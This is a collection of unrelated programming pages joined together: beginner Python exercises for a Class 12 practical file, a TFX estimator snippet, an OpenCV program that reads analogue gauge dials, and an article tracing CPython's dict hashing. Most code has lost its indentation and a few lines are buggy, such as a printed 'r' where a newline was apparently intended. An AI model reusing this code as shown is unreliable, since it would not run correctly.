print('/ for Division')
ch = input("Enter your choice:")
if ch=='+':
x=int(input("Enter value of a:"))
y=int(input("Enter value of b:"))
print("Addition:",add(x,y))
elif ch=='-':
x=int(input("Enter value of a:"))
y=int(input("Enter value of b:"))
print("Subtraction:",sub(x,y))
elif ch=='*':
x=int(input("Enter value of a:"))
y=int(input("Enter value of b:"))
print("Multiplication",mul(x,y))
elif ch=='/':
x=int(input("Enter value of a:"))
y=int(input("Enter value of b:"))
print("Division",div(x,y))
else:
print("Invalid character")
def add(a,b):
return a+b
def sub(a,b):
return a-b
def mul(a,b):
return a*b
def div(a,b):
return a/b
main()
2. Write a python program to convert a temperature in Celsius into Fahrenheit using a function.
def tempConvert():
cels = float(input("Enter temperature in celsius: "))
fh = (cels * 9/5) + 32
print('%.2f Celsius is: %0.2f Fahrenheit' %(cels, fh))
tempConvert()
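For practice, the inverse conversion follows by solving the same formula for Celsius (a small companion sketch, not part of the original question):
def tempConvertBack():
    fh = float(input("Enter temperature in fahrenheit: "))
    cels = (fh - 32) * 5/9
    print('%.2f Fahrenheit is: %0.2f Celsius' % (fh, cels))
tempConvertBack()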
3. Write a python program using a function to print Fibonacci series up to n numbers.
def fibo():
n=int(input("Enter the number:"))
a=0
b=1
temp=0
for i in range(0,n):
temp = a + b
b = a
a= temp
print(a, end=" ")
fibo()
4. Write a python program to return factorial series up to n numbers using a function.
def facto():
n=int(input("Enter the number:"))
f=1
for i in range(1,n+1):
f*=i
print(f, end=" ")
facto()
Now the next programs for Computer practical file Class 12 are based on parameters passing.
5. Write a python program to accept username “Admin” as default argument and password 123 entered by user to allow login into the system.
def user_pass(password,username="Admin"):
if password=='123':
print("You have logged into system")
else:
print("Password is incorrect!!!!!!")
password=input("Enter the password:")
user_pass(password)
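Because username has a default value, it can also be overridden at the call site; for example (an illustrative call, not in the original program):
user_pass('123', username="Guest")  # default 'Admin' replaced by 'Guest'; the password is still checked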
6. Write a menu-driven python program using different functions for the following menu:
Check no. is Palindrome or not
Check no. is Armstrong or not
Exit
import sys
def checkPalin(n):
temp=n
rem=0
rev=0
while(n>0):
rem=n%10
rev=rev*10+rem
n=n//10
if(temp==rev):
print("The number is a palindrome!")
else:
print("The number is not a palindrome!")
def checkArmstrong(n):
temp=n
rem=0
arm=0
while(n>0):
rem=n%10
arm+=rem**3
n=n//10
if(temp==arm):
print("The number is an armstrong!")
else:
print("The number is not an armstrong!")
def menu():
print("1.Check no. is Palindrome:")
print("2.Check no. is Armstrong:")
print("3.Exit")
opt=int(input("Enter option:"))
no=int(input("Enter number to check:"))
if opt==1:
checkPalin(no)
elif opt==2:
checkArmstrong(no)
elif opt==3:
sys.exit()
else:
print("Invalid option")
menu()
7. Write a python program using a function to print prime numbers between 11 to 200.
def print_primes(start, end):
    print("Prime numbers between", start, "and", end, "are:")
    for n in range(start, end + 1):
        if n > 1:
            for i in range(2, n):
                if (n % i) == 0:
                    break
            else:  # this else belongs to the for loop: it runs only if no divisor was found
                print(n, ",", end=" ")

print_primes(11, 200)
The next program for Computer practical file Class 12 is based on variable length argument.
8. Write a python program to demonstrate the concept of variable length argument to calculate sum and product of the first 10 numbers.
def sum10(*n):
total=0
for i in n:
total=total + i
print("Sum of first 10 Numbers:",total)
sum10(1,2,3,4,5,6,7,8,9,10)
def product10(*n):
pr=1
for i in n:
pr=pr * i
print("Product of first 10 Numbers:",pr)
product10(1,2,3,4,5,6,7,8,9,10)
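Since *n packs any number of arguments into a tuple, the same functions also accept an unpacked range (a quick illustration of the variable length argument):
sum10(*range(1, 11))      # unpacking works the same as listing 1..10 by hand
product10(*range(1, 11))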
The next program for Computer practical file Class 12 is based on different logics.
9. Write a python program to find maximum and minimum numbers among given 4 numbers.
Method 1: Using if..elif..else
def find_max():
n1=int(input("Enter number1:"))
n2=int(input("Enter number2:"))
n3=int(input("Enter number3:"))
n4=int(input("Enter number4:"))
if n1>n2 and n1>n3 and n1>n4:
print(n1," is maximum")
elif n2>n1 and n2>n3 and n2>n4:
print(n2," is maximum")
elif n3>n1 and n3>n2 and n3>n4:
print(n3," is maximum")
elif n4>n1 and n4>n2 and n4>n3:
print(n4," is maximum")
else:
print("All are equal")
Method 2: Using list
def find_max():
l=[]
max1=0
for i in range(4):
n=int(input("Enter number into list:"))
l.append(n)
print("The list is:",l)
for i in l:
if i>max1:
max1=i
print("Max:",max1)
Method 3: Using max function
def find_max():
l=[]
max1=0
for i in range(4):
n=int(input("Enter number into list:"))
l.append(n)
max1=max(l)
print("Max:",max1)
Method 4: Using sort() function
def find_max():
l=[]
max1=0
for i in range(4):
n=int(input("Enter number into list:"))
l.append(n)
l.sort()
print("Max:",l[-1])
The last program for Computer practical file Class 12 is based on diagram patterns.
10. Write a python program to print the following patterns using functions:
Diamond Pattern with *
Butterfly Pattern with *
Triangle Pattern with *
def pattern_diamond(n):
no = 0
for i in range(1, n + 1):
for j in range (1, (n - i) + 1):
print(end = " ")
while no != (2 * i - 1):
print("*", end = "")
no = no + 1
no = 0
print()
k = 1
no = 1
for i in range(1, n):
for j in range (1, k + 1):
print(end = " ")
k = k + 1
while no <= (2 * (n - i) - 1):
print("*", end = "")
no = no + 1
no = 1
print()
num=int(input("Enter no or lines to print:"))
pattern_diamond(num)
def pattern_butterfly(n):
for i in range(1, n + 1):
for j in range(1, 2 * n + 1):
if (i < j):
print("", end = " ");
else:
print("*", end = "");
if (i <= ((2 * n) - j)):
print("", end = " ");
else:
print("*", end = "");
print("");
for i in range(1, n + 1):
for j in range(1, 2 * n + 1):
if (i > (n - j + 1)):
print("", end = " ");
else:
print("*", end = "");
if ((i + n) > j):
print("", end = " ");
else:
print("*", end = "");
print("");
num=int(input("Enter no or lines to print:"))
pattern_butterfly(num);
def pattern_triangle(n):
for i in range(1, n+1):
for j in range(1, i+1):
print("* ",end="")
print("r")
num=int(input("Enter no or lines to print:"))
pattern_triangle(num)
So I hope these programs will help you prepare your Computer practical file for Class 12. If you have any doubt, feel free to ask in the comment section.
Don't forget to share your views, comments and feedback in the comment section.
|
When designing your TensorFlow modeling code for TFX, there are a few items to be aware of, including the choice of a modeling API.
Consumes: SavedModel from Transform, and data from ExampleGen
Emits: Trained model in SavedModel format
Your model's input layer should consume from the SavedModel that was created by a Transform component, and the layers of the Transform model should be included with your model so that when you export your SavedModel and EvalSavedModel they will include the transformations that were created by the Transform component.
A typical TensorFlow model design for TFX looks like this:
def _build_estimator(tf_transform_dir,
config,
hidden_units=None,
warm_start_from=None):
"""Build an estimator for predicting the tipping behavior of taxi riders.
Args:
tf_transform_dir: directory in which the tf-transform model was written
during the preprocessing step.
config: tf.contrib.learn.RunConfig defining the runtime environment for the
estimator (including model_dir).
hidden_units: [int], the layer sizes of the DNN (input layer first)
warm_start_from: Optional directory to warm start from.
Returns:
Resulting DNNLinearCombinedClassifier.
"""
metadata_dir = os.path.join(tf_transform_dir,
transform_fn_io.TRANSFORMED_METADATA_DIR)
transformed_metadata = metadata_io.read_metadata(metadata_dir)
transformed_feature_spec = transformed_metadata.schema.as_feature_spec()
transformed_feature_spec.pop(_transformed_name(_LABEL_KEY))
real_valued_columns = [
tf.feature_column.numeric_column(key, shape=())
for key in _transformed_names(_DENSE_FLOAT_FEATURE_KEYS)
]
categorical_columns = [
tf.feature_column.categorical_column_with_identity(
key, num_buckets=_VOCAB_SIZE + _OOV_SIZE, default_value=0)
for key in _transformed_names(_VOCAB_FEATURE_KEYS)
]
categorical_columns += [
tf.feature_column.categorical_column_with_identity(
key, num_buckets=_FEATURE_BUCKET_COUNT, default_value=0)
for key in _transformed_names(_BUCKET_FEATURE_KEYS)
]
categorical_columns += [
tf.feature_column.categorical_column_with_identity(
key, num_buckets=num_buckets, default_value=0)
for key, num_buckets in zip(
_transformed_names(_CATEGORICAL_FEATURE_KEYS), #
_MAX_CATEGORICAL_FEATURE_VALUES)
]
return tf.estimator.DNNLinearCombinedClassifier(
config=config,
linear_feature_columns=categorical_columns,
dnn_feature_columns=real_valued_columns,
dnn_hidden_units=hidden_units or [100, 70, 50, 25],
warm_start_from=warm_start_from)
|
last updated: 2020-12-06
Being a newbie with OpenCV, a good starting point and help for this code was the page by Nayak Abhijeet.
Here we see the result of our program:
gauge_p2.jpg We are reading: 497.1153 µm
On Linux python3 is already installed. We need the following modules (libraries):
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import glob
import cv2 as cv # to run the code even if version changes
import numpy as np
import pandas as pd
...
os is needed for operating system dependent functionality like changing the directory (os.chdir(DIR)).
glob finds all the pathnames matching a specified pattern and is used to get all files from an image directory.
cv2 is the OpenCV module to manipulate image data.
numpy (NumPy) is the fundamental package for scientific computing in Python. It provides a multidimensional array object and an assortment of routines for fast operations on arrays. Our images are such arrays.
pandas (Pandas) provides a fast and efficient DataFrame object for data manipulation with integrated indexing. Pandas is great for working with spreadsheet data. We use pandas e.g. to create a .csv file with the data.
On Linux use e.g. sudo apt install python3-opencv to install the libraries, or use pip:
pip3 install opencv-python
pip3 install pandas
We use Python version 3. On Linux, always use python3 (not python or python2) to call Python, and use pip3 instead of pip.
python3 read_analogue_gauge.py
To work on the program you can use IDLE, Python's Integrated Development Environment, but we prefer the Thonny IDE.
To run the program you need to adapt the directory path for the image files:
...
DIR_NAME_IMAGES = '/mydocs/read_dial_gauge/images'
...
If you can't change to Linux and are forced to use Windows :)).
Download Python from python.org and install the .exe file. On the first screen check "Add Python to PATH". This enables you to use Python everywhere.
Open command prompt (Start and type cmd) and use the following commands to install the missing modules:
pip install opencv-python
pip install pandas
To work on the program you can use IDLE, Python’s Integrated Development Environment, that was already installed with the .exe-file. We prefer the Thonny IDE, that also exists for Windows.
In Windows we need to adapt the directory path. The backslash needs to get doubled, like this:
...
DIR_NAME_IMAGES = 'C:\\mydocs\\read_dial_gauge\\images'
...
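Alternatively, a raw string avoids the doubled backslashes:
...
DIR_NAME_IMAGES = r'C:\mydocs\read_dial_gauge\images'
...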
If further help for python on Windows is needed click here: Using Python on Windows.
An overview on OpenCV methods can be found on my OpenCV basics page:
That is a good starting point to understand the following code.
#!/usr/bin/python3
# -*- coding: utf-8 -*-
""" Read pointer-type dials on an analogue gauge """
###############################################################################
#
# Name: read_analogue_gauge.py
# Purpose: read pointer-type dials on an analogue gauge
# Author: weigu.lu
# Date: 2020-12-06
# Version 1.1
#
# Copyright 2020 weigu <weigu@weigu.lu>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# source:
# https://medium.com/@nayak.abhijeet1/
# analogue-gauge-reader-using-computer-vision-62fbd6ec84cc
#
# More infos on weigu.lu/other_projects
#
###############################################################################
import os
import glob
import cv2 as cv # to run code even if version changes
import numpy as np
import pandas as pd
DIR_NAME_IMAGES = '/savit/programming/python/read_dial_gauge/images'
MAX_PIXEL = 1000 # reduce picture to this size for quicker calculations
DEBUG = 0
MIN_RADIUS_RATIO_1 = 0.8 # Where to look for the first circle
MAX_RADIUS_RATIO_1 = 0.95
MIN_RADIUS_RATIO_2 = 0.85 # Where to look for the second circle
MAX_RADIUS_RATIO_2 = 0.98
L1_P1_LOW = 0 # boundary how close the line (P1) should be from the center
L1_P1_UP = 0.3
L1_P2_LOW = 0.7 # how close P2 should be to the outside of the gauge
L1_P2_UP = 0.9
L2_P1_LOW = 0 # boundary how close the line (P1) should be from the center
L2_P1_UP = 0.3
L2_P2_LOW = 0.8 # how close P2 should be to the outside of the gauge
L2_P2_UP = 0.995
### the functions ###
def avg_circles(pcircles, pb):
'''averaging out nearby circles'''
avg_x = 0
avg_y = 0
avg_r = 0
for i in range(pb): # optional: av. multiple circles (gauge at a slight angle)
avg_x = avg_x + pcircles[0][i][0]
avg_y = avg_y + pcircles[0][i][1]
avg_r = avg_r + pcircles[0][i][2]
avg_x = int(avg_x/(pb))
avg_y = int(avg_y/(pb))
avg_r = int(avg_r/(pb))
return avg_x, avg_y, avg_r
def dist_2_pts(px1, py1, px2, py2):
'''pythagore'''
return np.sqrt((px2 - px1)**2 + (py2 - py1)**2)
def show_image(pimg, show_flag_time):
''' Show image during x ms if flag is set. Parameter show_flag_time is a
tuple e.g (1,2000) to show picture for 2s or (0,2000) to prevent the
show. (1,0) waits on keypress'''
if show_flag_time[0] == 1:
cv.imshow('image', pimg) # cv.imshow(window_name, image)
cv.waitKey(show_flag_time[1]) # show picture for x ms (x=0 for keypress)
cv.destroyAllWindows()
def get_img_reduce_size(l_img_name, max_pixel):
'''get image and reduce size to max_pixel'''
mimg = cv.imread(l_img_name) # read the image
if DEBUG:
print('Original image shape: ', mimg.shape)
row, col = mimg.shape[:2] # get number of rows (height), columns (width)
if row >= col and row > max_pixel: # calculate ratio to reduce image
ratio = max_pixel/row
elif col >= row and col > max_pixel:
ratio = max_pixel/col
else:
ratio = 1.0
mimg = cv.resize(mimg, (0, 0), fx=ratio, fy=ratio)
mheight, mwidth = mimg.shape[:2]
if DEBUG:
print('Reduced image shape: ', mheight, mwidth)
mgrey_img = cv.cvtColor(mimg, cv.COLOR_BGR2GRAY) # convert to grey image
return mimg, mgrey_img, mheight, mwidth
def get_circle_and_crop_image(pimg, red_ratio, minrr, maxrr):
''' Reduce image size with red_ratio (needed for second pointer
Getting circles using HoughCircles. Important for a good result are the
two last parameter: minRadius and maxRadius! Adjust to your image. '''
mheight, mwidth = pimg.shape[:2]
new_height = int(mheight*red_ratio)
new_width = int(mwidth*red_ratio)
mx1 = (mwidth - new_width)
my1 = (mheight - new_height)
mimg = pimg[my1:new_height, mx1:new_width]
mgrey_img = cv.cvtColor(mimg, cv.COLOR_BGR2GRAY) # convert to grey image
mgrey_blured_img = cv.medianBlur(mgrey_img, 5)
mheight, mwidth = mgrey_blured_img.shape[:2]
circles = cv.HoughCircles(mgrey_blured_img, cv.HOUGH_GRADIENT, 1, 20, np.array([]), 100, 50,
int(mheight*minrr/2), int(mheight*maxrr/2))
b = circles.shape[1]
if DEBUG:
print('Number of circles: ', b)
mcircles_img = mimg.copy()
mcircle_img = mimg.copy()
for (mx, my, mr) in circles[0, :]:
cv.circle(mcircles_img, (int(mx), int(my)), int(mr), (0, 255, 0), 3)
cv.circle(mcircles_img, (int(mx), int(my)), 2, (0, 255, 0), 3)
mx, my, mr = avg_circles(circles, b) # averaging out nearby circles
cv.circle(mcircle_img, (mx, my), mr, (0, 255, 0), 3)
cv.circle(mcircle_img, (mx, my), 2, (0, 255, 0), 3)
rect_x = (mx - mr) # crop image to circle (x=r, y=r)
rect_y = (my - mr)
cropped_img = mimg[rect_y:(rect_y+2*mr), rect_x:(rect_x+2*mr)]
cropped_circle_img = mcircle_img[rect_y:(rect_y+2*mr), rect_x:(rect_x+2*mr)]
cropped_grey_img = mgrey_img[rect_y:(rect_y+2*mr), rect_x:(rect_x+2*mr)]
mheight, mwidth = cropped_circle_img.shape[:2]
if DEBUG:
print('Reduced image shape: ', mheight, mwidth)
return mr, mr, mr, mcircles_img, cropped_img, cropped_circle_img, \
cropped_grey_img
def get_pointer(px, py, pimg, pgrey_img, p1_b_low, p1_b_up, p2_b_low, p2_b_up):
''' Create a threshhold image to get lines using HoughLinesP. '''
THRESH = 100 # test which threshhold function performs best
MAX_VALUE = 180
MIN_LINE_LENGTH = 100
MAX_LINE_GAP = 10
mgrey_img = cv.medianBlur(pgrey_img, 5)
threshhold_img = cv.threshold(mgrey_img, THRESH, MAX_VALUE, cv.THRESH_BINARY_INV)[1]
lines = cv.HoughLinesP(image=threshhold_img, rho=3, theta=np.pi / 180, threshold=100,
minLineLength=MIN_LINE_LENGTH, maxLineGap=MAX_LINE_GAP)
mlines_img = pimg.copy()
mline_img = pimg.copy()
for line in lines: # create image with lines
mx1, my1, mx2, my2 = line[0]
cv.line(mlines_img, (mx1, my1), (mx2, my2), (0, 255, 0), 2)
    # the acceptable distance ranges for P1/P2 come in via the parameters above
mx1, my1, mx2, my2 = calculate_pointer(px, py, lines, p1_b_low, p1_b_up,
p2_b_low, p2_b_up)
cv.line(mline_img, (mx1, my1), (mx2, my2), (0, 255, 0), 2) # create image w line
return mx1, my1, mx2, my2, threshhold_img, mlines_img, mline_img
def calculate_pointer(px, py, plines, p1_b_low, p1_b_up, p2_b_low, p2_b_up):
'''calculate the pointer'''
final_line_list = []
for i, pline in enumerate(plines):
for mx1, my1, mx2, my2 in pline:
diff1 = dist_2_pts(px, py, mx1, my1) # x, y is center of circle
diff2 = dist_2_pts(px, py, mx2, my2) # x, y is center of circle
if diff1 > diff2: # set diff1 to be the smaller (closest to center)
diff1, diff2 = diff2, diff1 # of the two,makes the math easier
if (p1_b_low*r < diff1 < p1_b_up*r) and \
(p2_b_low*r < diff2 < p2_b_up*r): # check if in acceptable range
final_line_list.append([mx1, my1, mx2, my2]) # add to final list
try:
mx1 = final_line_list[0][0]
my1 = final_line_list[0][1]
mx2 = final_line_list[0][2]
my2 = final_line_list[0][3]
except IndexError:
print("\nWrong matching line found? recheck this part of code!\n")
return mx1, my1, mx2, my2
def get_red(pimg):
'''filter the red channel'''
img_hsv = cv.cvtColor(pimg, cv.COLOR_BGR2HSV)
red_min = np.array([0, 60, 0])
red_max = np.array([10, 255, 255])
mask = cv.inRange(img_hsv, red_min, red_max)
return ~mask # return inverted image
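# Added note (a sketch, not in the original program): in OpenCV's HSV space the
# hue channel runs from 0 to 179 and red wraps around, so a second mask for the
# upper hue range would also catch the remaining red pixels:
def get_red_full(pimg):
    '''filter both red hue ranges (red wraps around 0/179 in OpenCV HSV)'''
    img_hsv = cv.cvtColor(pimg, cv.COLOR_BGR2HSV)
    mask_low = cv.inRange(img_hsv, np.array([0, 60, 0]), np.array([10, 255, 255]))
    mask_high = cv.inRange(img_hsv, np.array([170, 60, 0]), np.array([179, 255, 255]))
    return ~(mask_low | mask_high)  # inverted, like get_red above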
def calculate_angle_and_value(px, py, px1, py1, px2, py2):
'''calculate the angle and value'''
dist_pt0 = dist_2_pts(px, py, px1, py1)
dist_pt1 = dist_2_pts(px, py, px2, py2)
if dist_pt0 > dist_pt1:
xlen = px1 - px
ylen = py - py1
else:
xlen = px2 - px
ylen = py - py2
if xlen == 0:
xlen = 0.0000000000000000001
res = np.arctan(np.divide(float(abs(ylen)), float(abs(xlen)))) # arc-tan
res = np.rad2deg(res)
if DEBUG:
print("res", res)
print("xlen, ylen", xlen, ylen)
if xlen < 0 and ylen > 0: # quadrant 4
final_angle = res + 270
if xlen > 0 and ylen > 0: # quadrant 1
final_angle = 90 - res
if xlen > 0 and ylen < 0: # quadrant 2
final_angle = 90 + res
if xlen < 0 and ylen < 0: # quadrant 3
final_angle = 270 - res
value = final_angle/360*100
return final_angle, value
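# Added note (a sketch, not the author's code): the quadrant bookkeeping above
# can be avoided with np.arctan2, which resolves the signs directly; 0 degrees
# at 12 o'clock, increasing clockwise, matching final_angle above:
def angle_clockwise_from_12(px, py, tip_x, tip_y):
    '''equivalent angle computation using arctan2'''
    ang = np.rad2deg(np.arctan2(tip_x - px, py - tip_y))
    return ang % 360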
# flags and times in ms to show images
flag = {"reduced":(0, 500), "grey":(0, 500), "circles":(0, 500),
"circle":(0, 500), "threshhold":(0, 500), "lines":(0, 500),
"line":(1, 500), "circles_2":(0, 500), "circle_2":(0, 1500),
"grey_2":(0, 5000), "threshhold_2":(0, 200), "lines_2":(0, 500),
"line_2":(1, 500)}
os.chdir(DIR_NAME_IMAGES) # change directory
img_list = glob.glob('*.jpg') # get list with jpg images
img_list.extend(glob.glob('*.png')) # and png images
img_list.sort()
if img_list == []:
print("error: no images!")
data_saved = dict.fromkeys(img_list, 0) # create dictionary from list
print(data_saved)
for img_name in img_list:
print(img_name, end='')
img, grey_img, height, width = get_img_reduce_size(img_name, MAX_PIXEL)
show_image(img, flag["reduced"])
x, y, r, circles_img, img, circle_img, grey_img = \
get_circle_and_crop_image(img, 1, MIN_RADIUS_RATIO_1,
MAX_RADIUS_RATIO_1)
show_image(grey_img, flag["grey"])
show_image(circles_img, flag["circles"])
show_image(circle_img, flag["circle"])
x1, y1, x2, y2, threshhold_image, lines_img, line_img = \
get_pointer(r, r, circle_img, grey_img, L1_P1_LOW, L1_P1_UP, L1_P2_LOW,
L1_P2_UP)
show_image(threshhold_image, flag["threshhold"])
show_image(lines_img, flag["lines"])
show_image(line_img, flag["line"])
# cv.imwrite("first_pointer.jpg",line_img)
final_angle_1, value_1 = calculate_angle_and_value(x, y, x1, y1, x2, y2)
x, y, r, circles_img, img, circle_img, grey_img = \
get_circle_and_crop_image(img, 0.77, MIN_RADIUS_RATIO_2,
MAX_RADIUS_RATIO_2)
show_image(circles_img, flag["circles_2"])
show_image(circle_img, flag["circle_2"])
grey_img = get_red(circle_img) # to eliminate black pointer
show_image(grey_img, flag["grey_2"])
show_image(grey_img, flag["circle_2"])
x1, y1, x2, y2, threshhold_image, lines_img, line_img = \
get_pointer(r, r, img, grey_img, L2_P1_LOW, L2_P1_UP, L2_P2_LOW,
L2_P2_UP)
show_image(threshhold_image, flag["threshhold_2"])
show_image(lines_img, flag["lines_2"])
show_image(line_img, flag["line_2"])
# cv.imwrite("second_pointer.jpg",line_img)
final_angle_2, value_2 = calculate_angle_and_value(x, y, x1, y1, x2, y2)
if DEBUG:
print(final_angle_1, value_1)
print(final_angle_2, value_2)
result = round((int(value_2/2) + value_1/100)*10, 4)
print("\tWe are reading: ", result, "µm\n")
data_saved[img_name] = result
if DEBUG:
print(data_saved)
df = pd.DataFrame(data_saved, index=[0]) # pandas dataframe
df.to_csv("my_data.csv", index=False) # save data to csv file
|
An interview question
This article stems from one of the most common Python interview questions:
Q: Can a list object be used as a dict key? What about a tuple?
A: No. A list is a Mutable type and cannot be used as a dict key, while a tuple is an Immutable type and can be.
Let's run an experiment and get a feel for the answer above from the error raised by dict assignment:
>>> d = {}
>>> l = [1, 2, 3]
>>> d[l]=123
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unhashable type: 'list'
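For contrast, a tuple key is accepted without complaint (a quick check in the same session):
>>> d[(1, 2, 3)] = 123
>>> d
{(1, 2, 3): 123}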
The error message says it plainly: list is an unhashable type, so hashability is the key point. Now compare list and tuple with respect to hashability:
>>> list.__dict__
mappingproxy({'__repr__': <slot wrapper '__repr__' of 'list' objects>, '__hash__': None, ...})
>>> tuple.__dict__
mappingproxy({'__repr__': <slot wrapper '__repr__' of 'tuple' objects>, '__hash__': <slot wrapper '__hash__' of 'tuple' objects>, ...})
Note the magic method __hash__: in the list type __hash__ is set to None, while tuple holds a real implementation. Let's boldly guess that tuple is hashable precisely because it implements __hash__, and verify:
>>> l.__hash__()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: 'NoneType' object is not callable
>>> t=(1,2,3)
>>> t.__hash__() # judging by the output format, this is very likely the object's hash value
2528502973977326415
Black-box experiments like these are never fully reassuring: is it really just about whether __hash__ is implemented? Trying to read the source of list.__hash__ and tuple.__hash__ gets us nowhere, since these functions are implemented directly by the Python interpreter. To settle the question, I downloaded the CPython 3.8.2 source from the official site to dig deeper. There are two possible approaches:
Trace down from dict.__setitem__
Locate the error message text
Clearly the second, reverse approach is more efficient (the first is actually a dead end, because below dict.__setitem__ lies C source, so nothing more can be learned at the Python level). A global search for the text unhashable type locates two places in CPython's C source, shown below:
static Py_hash_t PyCData_nohash(PyObject *self)
{
PyErr_SetString(PyExc_TypeError, "unhashable type");
return -1;
}
// ****************************** divider ****************************** //
// File: Objects/object.c
Py_hash_t PyObject_HashNotImplemented(PyObject *v)
{
PyErr_Format(PyExc_TypeError, "unhashable type: '%.200s'",
Py_TYPE(v)->tp_name);
return -1;
}
It's easy to tell that the Objects/object.c implementation is the relevant one, because the unhashable type text there is followed by the Python object's type name, which is what produces the complete error message:
So now we know that PyObject_HashNotImplemented() is the source of the error raised when a dict is assigned a key of a Mutable type. Next we just track where this function is called to find the logic by which dict decides whether a key is hashable. In fact, the name PyObject_HashNotImplemented already gives a lot away: it hints that the answer is most likely our initial guess, namely that __hash__ is not implemented.
Working up the call chain
Following the vine to the melon: there are many call sites of PyObject_HashNotImplemented() in the source, but one function caught my attention, because its implementation contains the logic that checks whether a type's hash function exists:
Py_hash_t PyObject_Hash(PyObject *v)
{
PyTypeObject *tp = Py_TYPE(v);
if (tp->tp_hash != NULL)
return (*tp->tp_hash)(v);
/* To keep to the general practice that inheriting
* solely from object in C code should work without
* an explicit call to PyType_Ready, we implicitly call
* PyType_Ready here and then check the tp_hash slot again
*/
if (tp->tp_dict == NULL) {
if (PyType_Ready(tp) < 0)
return -1;
if (tp->tp_hash != NULL)
return (*tp->tp_hash)(v);
}
// Note: if tp_hash is NULL, PyObject_HashNotImplemented is called and the error is raised
/* Otherwise, the object can't be hashed */
return PyObject_HashNotImplemented(v);
}
OK, let's keep looking for where PyObject_Hash() is called; it feels like the truth is close. Again, the whole source tree is full of calls to it, and many C files can be ruled out as unrelated to dict just from their names. In the end, one particular C file name and function name caught my eye, all but announcing that this is the C implementation of dict 😂. The code follows:
int PyDict_SetItem(PyObject *op, PyObject *key, PyObject *value)
{
PyDictObject *mp;
Py_hash_t hash;
if (!PyDict_Check(op)) {
PyErr_BadInternalCall();
return -1;
}
assert(key);
assert(value);
mp = (PyDictObject *)op;
if (!PyUnicode_CheckExact(key) ||
(hash = ((PyASCIIObject *) key)->hash) == -1)
{
// Note: get the key's hash. If the hash function is NULL (see the implementation of PyObject_Hash), this returns -1 (and raises a TypeError)
hash = PyObject_Hash(key);
if (hash == -1)
return -1;
}
if (mp->ma_keys == Py_EMPTY_KEYS) {
return insert_to_emptydict(mp, key, hash, value);
}
/* insertdict() handles any resizing that might be necessary */
return insertdict(mp, key, hash, value);
}
At this point the truth is essentially out: we've found the C implementation of dict's set function, which contains the logic for checking whether a key is hashable, returning -1 upward when it is not. Still, in the spirit of getting to the bottom of things, let's see where PyDict_SetItem() itself gets called 🤔.
// For readability, the order of the variables and functions below has been rearranged
// 1. Tracing PyDict_SetItem: this function wraps dict assignment and deletion, exposing a single entry point
static int dict_ass_sub(PyDictObject *mp, PyObject *v, PyObject *w)
{
if (w == NULL)
return PyDict_DelItem((PyObject *)mp, v);
else
return PyDict_SetItem((PyObject *)mp, v, w);
}
// 2. Tracing dict_ass_sub: this is the struct that stores dict's mapping function pointers
static PyMappingMethods dict_as_mapping = {
(lenfunc)dict_length, /*mp_length*/
(binaryfunc)dict_subscript, /*mp_subscript*/
(objobjargproc)dict_ass_sub, /*mp_ass_subscript*/
};
// 3. Tracing dict_as_mapping: we finally find that PyDict_Type stores this struct
PyTypeObject PyDict_Type = {
PyVarObject_HEAD_INIT(&PyType_Type, 0)
"dict",
// ...
&dict_as_mapping, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
// ...
dict_new, /* tp_new */
PyObject_GC_Del, /* tp_free */
};
// 4. Finally, confirming where PyDict_Type is used: dict_new should be what Python calls when allocating memory for a dict. With that, the whole trace is complete
static PyObject *
dict_new(PyTypeObject *type, PyObject *args, PyObject *kwds)
{
PyObject *self;
PyDictObject *d;
// allocate memory space for the dict type
assert(type != NULL && type->tp_alloc != NULL);
self = type->tp_alloc(type, 0);
if (self == NULL)
return NULL;
d = (PyDictObject *)self;
/* The object has been implicitly tracked by tp_alloc */
if (type == &PyDict_Type)
_PyObject_GC_UNTRACK(d);
d->ma_used = 0;
d->ma_version_tag = DICT_NEXT_VERSION();
d->ma_keys = new_keys_object(PyDict_MINSIZE);
if (d->ma_keys == NULL) {
Py_DECREF(self);
return NULL;
}
ASSERT_CONSISTENT(d);
return self;
}
One more find: the file Objects/odictobject.c contains a comment to this effect:
Although odictobject.c and dictobject.c implement two dicts with different purposes, by rights the two implementations should expose nearly identical external APIs, so that comment confirms from another angle that dict's assignment function is indeed PyDict_SetItem.
Verifying the deduction
The process above established that assigning a key to a dict checks whether the key implements a hash function. We can verify this once more from the list and tuple side. list is a Mutable type: it does not implement a hash function, and its tp_hash points to PyObject_HashNotImplemented. tuple is an Immutable type: it implements a hash function, and its tp_hash points to the corresponding hash function. The code follows, and the result matches expectations:
PyTypeObject PyTuple_Type = {
PyVarObject_HEAD_INIT(&PyType_Type, 0)
"tuple",
// ...
(hashfunc)tuplehash, /* tp_hash */
// ...
};
PyTypeObject PyList_Type = {
PyVarObject_HEAD_INIT(&PyType_Type, 0)
"list",
// ...
PyObject_HashNotImplemented, /* tp_hash */
// ...
};
Summary
We've chased the source for quite a while, so it's time to sum up.
Original question: why can't a list be a dict key?
Extended question: why can't a dict key be a mutable type, and what distinguishes mutable from immutable types?
Conclusion: tracing the CPython source shows that assigning to a dict calls PyDict_SetItem, which checks whether the key object implements a hash function (by checking whether the function pointer is NULL); if not, it raises an error reporting the type as unhashable. This also brought up Mutable vs Immutable types, but this article has not yet established whether the two differ in anything beyond the hash function.
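The same mechanism can be demonstrated from pure Python: setting __hash__ to None on a class (which is exactly what list does) makes its instances unhashable. A minimal sketch:
class WithHash:
    pass

class NoHash:
    __hash__ = None  # mirrors list: the type's tp_hash slot becomes NULL

d = {}
d[WithHash()] = 1        # fine: the default object hash is used
try:
    d[NoHash()] = 2
except TypeError as e:
    print(e)             # unhashable type: 'NoHash'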
Originally published: 2020-04-21
Author: 枉信焕
Source: Juejin (掘金); follow Juejin for related information
|
How to load an image into image view?
Been trying to get an idea of mine working. I made a script to download galleries, and I'm trying to set the image view after the image has been downloaded.
